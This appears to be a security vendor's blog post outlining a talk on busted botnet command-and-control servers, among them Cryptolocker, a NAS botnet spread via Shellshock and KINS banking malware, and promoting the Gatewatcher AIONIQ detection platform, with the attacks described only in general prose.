Hunting Advanced BotNets with NDR Solutions


Botnets are everywhere and play a crucial part in the kill-chain process in our world of cyber security. “EarthLink Spammer,” the 1st publicly recorded Botnet, is dating back to 2000, built for spam by Khan K. Smith. This Botnet aimed to deliver phishing-spam emails with the hope of collecting credit card information. Smith was caught and sued for $25 million, when he only earned $3 million. 

A giant botnet publicly revealed was the Bredolab Russian Botnet, with an estimated 30 million bots (victims). It sent malicious emails that included malware attachments that would infect a computer when opened, effectively turning the laptop into another zombie controlled by the Botnet. At its peak, the Botnet could send 3,6 billion infected emails daily. The other form of propagation was drive-by downloads, which exploit software security vulnerabilities. This method allowed the Botnet to bypass software protection to facilitate downloads without the user being aware of them.


Malware attacks and botnets behind this massive illegal industry drain our pockets and even take our lives. These criminal organizations have rules and secrets they don’t want to be revealed. They like to infect, hack and control victims without getting caught by law enforcement. End-point security is not enough to prevent zero-day malware attacks, so research has been focusing on their command and control centers. In 2013, I started to bust advanced botnets to see how they operate and what they steal from victims. Very fast, this became my passion with the hope that we can provide in-depth intelligence to the cyber security community. With this aim, I managed to bust over 20 unique C&C/Botnet servers and reveal their dirty secrets. 

Presentation outline

In this presentation, we will reveal the famously neutralized botnets from inside and outside, with all the source code, files, and logic behind those criminals. By showing these busted C&C servers, we will see and learn how seriously they take this illegal business, and we will have a chance to peek inside them.

  • Inside Cryptolocker C&C server

CryptoLocker was a ransomware trojan that targeted computers running Microsoft Windows and was first detected in September 2013. CryptoLocker propagated via infected email attachments and an existing botnet; when activated, the malware encrypted certain types of files stored on locally and mounted network drives using RSA public-key cryptography, with the private key stored only on the malware’s control servers. 

  • Revealing Unique MitB Builder C&C Server

These injectors are the primary weapon used by cybercriminals for electronic banking applications where 2-factor authentication “tokens” is implemented. We know how easy it is to go underground and buy malware-as-a-service kits for trojans, ransomware, d-dos bots, etc. But what about a service for Man in the Browser attacks for well-known electronic banking web applications and also to order a custom one? 

  • NAS Botnet Revealed

The attackers send a GET request with Shellshock exploit to all IP ranges around the Internet. The successfully hacked NAS devices are forced to download a payload from the Internet. This payload contains a SH script with clever design logic specially built for QNAP NAS devices. The payload downloads the ELF Linux installer package with BOT functionality for DDOS. From this point, the attacker makes persistence with autorun script inside the compromised NAS device. 

  • Kins origin malware acting like a real E-banking web app 

We uncovered a C&C server used by hackers to control the infected victims. The malware analysis done on victim’s machines revealed that malware from the KINS family targets specific Italian bank users thanks to ATSEngine, with the capability to dynamically inject a code in the victim’s browser and manage the “drops” in a completely automatic way. 

  • Are 2-factor authentications enough to protect your money? 

During the recent malware analysis targeting Italian financial institutions, we found a compelling piece that can bypass the 2FA with a malicious app installed on the phone. Malware like this can drive users to download the fake application on their phone from the official Google Play Store using a Man in browser attack (MITB). Once on the user’s PC, the attacker can control the machine and interact with it through a C&C server. What we explain in this article is a natural active botnet with at least 40-compromised zombie hosts.


Detecting and blocking Botnet traffics is a massive challenge in the cyber security world because of the evolving technics that attackers implement to avoid detection. There are two architecture modes of botnets’ operation: the client-server mode and the peer-to-peer model.

Non-encrypted Botnet can be detected by network security solutions such as IDS and NGFW, but today, botnets are getting more sophisticated as they can use legitimate encrypted networks traffic for their C&C, like Twitter or DropBox, and they are also immune against SSL offloading by implementing certificate pinning on the payload by itself. This technique leaves traditional network security solutions blind if they cannot process and detect encrypted data using AI and ML. 

With AIONIQ, Gatewatcher can process and detect “DGA “unknown C&C traffic within encrypted traffic using AI and supervised ML. AionIQ, is a recent network detection and response platform that can confidently identify malicious actions and suspicious behavior by mapping all assets on the network. Combining this capability with unique performance in analyzing even encrypted network flows, AionIQ provides a 360-degree view of the level of cyber risk associated with each connection between assets and users, for an unparalleled level of detection and visibility.

Another unique capability of AIONIQ over other competing NDR solutions is the integration of a sandbox module called AIONBYTES that can help detect unknown malware samples using legitimate domains/services such as DropBox, Twitter, Slack and TOR for secret botnet traffic. This capability allows us to link the malware (sha256) to the domain or IP that is carrying the botnet traffic.

LastInfoSec is the latest gem integrated into the Gatewatcher detection framework. This CTI platform pushes real-time cyber intelligence to help our customers be alerted to threats around the world.

Author: Senad ARUC

Table of contents

Share this post :
Our most recent post
Share this post :
Our last news